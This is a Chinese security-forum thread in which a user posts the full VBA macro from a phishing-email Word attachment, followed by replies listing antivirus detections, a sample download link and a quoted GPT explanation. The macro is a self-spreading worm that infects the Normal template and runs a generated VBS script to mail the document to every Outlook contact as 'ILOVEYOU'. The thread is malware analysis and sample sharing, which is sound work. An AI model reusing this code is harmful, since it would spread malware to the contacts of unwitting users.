宏病毒样本 1x

python无名氏

一封钓鱼邮件来的，说什么从我账户里扣除了3000$用于购买母亲节钻石，要我看附件里的doc[过滤]，笑死，我一分钱没有好久没有收到类似的钓鱼邮件了
下下来olevba了一下，根据感染标记，就姑且叫他PHMM吧！
VBA代码：

1. 
   
2. 'PHMM
   
3. Sub AutoOpen()
   
4. On Error Resume Next
   
5. Application.DisplayStatusBar = False
   
6. Options.SaveNormalPrompt = False
   
7. Ourcode = ThisDocument.VBProject.VBComponents(1).CodeMoudle.Lines(1, 100)
   
8. Set Host = ActiveDocument.VBProject.VBComponents(1).CodeMoudle
   
9. If ThisDocument = NormalTemplate Then
   
10.     Set Host = ActiveDocument.VBProject.VBComponents(1).CodeMoudle
    
11. End If
    
12. With Host
    
13.     If .Lines(1.1) <> "'PHMM" Then
    
14.         .DeleteLines 1,  .CountOfLines
    
15.         .InsertLines 1, Ourcode
    
16.         .ReplaceLines 2, "Sub AutoClose()"
    
17.         If ThisDocument = NormalTemplate Then
    
18.             .ReplaceLines 2, "Sub AutoOpen()"
    
19.             ActiveDocument.SaveAs ActiveDocument.FullName
    
20.         End If
    
21.     End If
    
22. End With
    
23. Open Environ("TEMP") & "" & "Sender.vbs" For Output Access Write As #1
    
24. Print #1, "On Error Resume Next"
    
25. Print #1, "dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad"
    
26. Print #1, "set regedit=CreateObject" & Chr(40) & Chr(34) "WScript.Shell" & Chr(34) & ")"
    
27. Print #1, "set out=WScript.CreateObject" & Chr(40) & Chr(34) & "Outlook.Application" & Chr(34) & Chr(41)"
    
28. Print #1, "set mapi=out.GetNameSpace" & Chr(40) & Chr(34) & "MAPI" & Chr(34) & Chr(41)"
    
29. Print #1, "for ctrlists=1 to mapi.AddressLists.Count"
    
30. Print #1, "set a=mapi.AddressLists(ctrlists)"
    
31. Print #1, "x=1"
    
32. Print #1, "regv=regedit.RegRead(" & Chr(34) & "HKEY_CURRENT_USER\Software\Microsoft\WAB" & Chr(34) & "&a)"
    
33. Print #1, "if (regv="Chr(34) & Chr(34) & Chr(41) & " then"
    
34. Print #1, "regv=1"
    
35. Print #1, "end if"
    
36. Print #1, "if (int(a.AddressEntries.Count)>int(regv)) then"
    
37. Print #1, "for ctrentries=1 to a.AddressEntries.Count"
    
38. Print #1, "malead=a.AddressEntries(x)"
    
39. Print #1, "regad=" & Chr(34) & Chr(34)
    
40. Print #1, "regad=regedit.RegRead(" & Chr(34) & "HKEY_CURRENT_USER\Software\Microsoft\WAB" & Chr(34) & "&malead)"
    
41. Print #1, "if (regad=" & Chr(34) & Chr(34) & Chr(41) & " then"
    
42. Print #1, "set male=out.CreateItem(0)"
    
43. Print #1, "male.Recipients.Add(malead)"
    
44. Print #1, "male.Subject = " & Chr(34) & "ILOVEYOU" & Chr(34)
    
45. Print #1, "male.Body = vbcrlf & " & Chr(34) & "Please look at the attachments!" & Chr(34)
    
46. Print #1, "male.Attachments.Add" & Chr(40) & Chr(34) & ActiveDocument.FullName & Chr(34) & Chr(41)
    
47. Print #1, "male.Send"
    
48. Print #1, "regedit.RegWrite " & Chr(34) & "HKEY_CURRENT_USER\Software\Microsoft\WAB" & Chr(34) & "&malead,1," & Chr(34) & "REG_DWORD" & Chr(34)"
    
49. Print #1, "end if"
    
50. Print #1, "x=x+1"
    
51. Print #1, "next"
    
52. Print #1, "regedit.RegWrite  "& Chr(34) & "HKEY_CURRENT_USER\Software\Microsoft\WAB" & Chr(34) & "&a,a.AddressEntries.Count"
    
53. Print #1, "end if"
    
54. Print #1, "regedit.RegWrite " & Chr(34) & "HKEY_CURRENT_USER\Software\Microsoft\WAB" & Chr(34) & "&a,a.AddressEntries.Count"
    
55. Print #1, "next"
    
56. Print #1, "Set out=Nothing"
    
57. Print #1, "Set mapi=Nothing"
    
58. Close #1
    
59. Shell("wscript " & Environ("TEMP") & "" & "Sender.vbs")
    
60. End Sub
    
61. 
    

复制代码

看微步分析出了loveletter，我也是醉了...
没有具体的什么恶意行为
样本微步链接(原样本被误删)：https://s.threatbook.com/report/ ... baa81c7f0a5fbbd379b
(话说这个让人打开宏的把戏好劣质...)

luoying2334

火绒 kill

dght432

https://pan.huang1111.cn/s/GDm6iW

anthonyqian

诺顿missed
F-Secure 自己的引擎检测到 Trojan-Downloader:W97M/Neurevt.C

莒县小哥

ANY.LNK

微软机器学习击杀Trojan:O97M/Sadoca.C!ml

117054487

SweetieRamRem

GPT：“这段代码可能是一种恶意代码，因为它会尝试发送垃圾邮件并进行系统更改。

首先，该代码隐藏了状态栏并禁用了保存文件时的提示。这些操作可能会误导用户，导致用户不知道发生了什么，而在后续的操作中，该代码打开了一个 VB 脚本文件并编写了发送垃圾邮件的代码。该代码从 Outlook 应用程序中获取邮件地址，并发送带有恶意附件的邮件。
此外，该代码还会检查当前文档是否为 NormalTemplate，如果是，它会尝试将其保存到文件系统，可能会覆盖或破坏正常的文档。
因此，如果您不信任此代码的来源或目的，请不要运行它。建议使用杀毒软件或其他安全工具来检查和处理这段代码。”

jdsh

智量

HJV

火绒
killed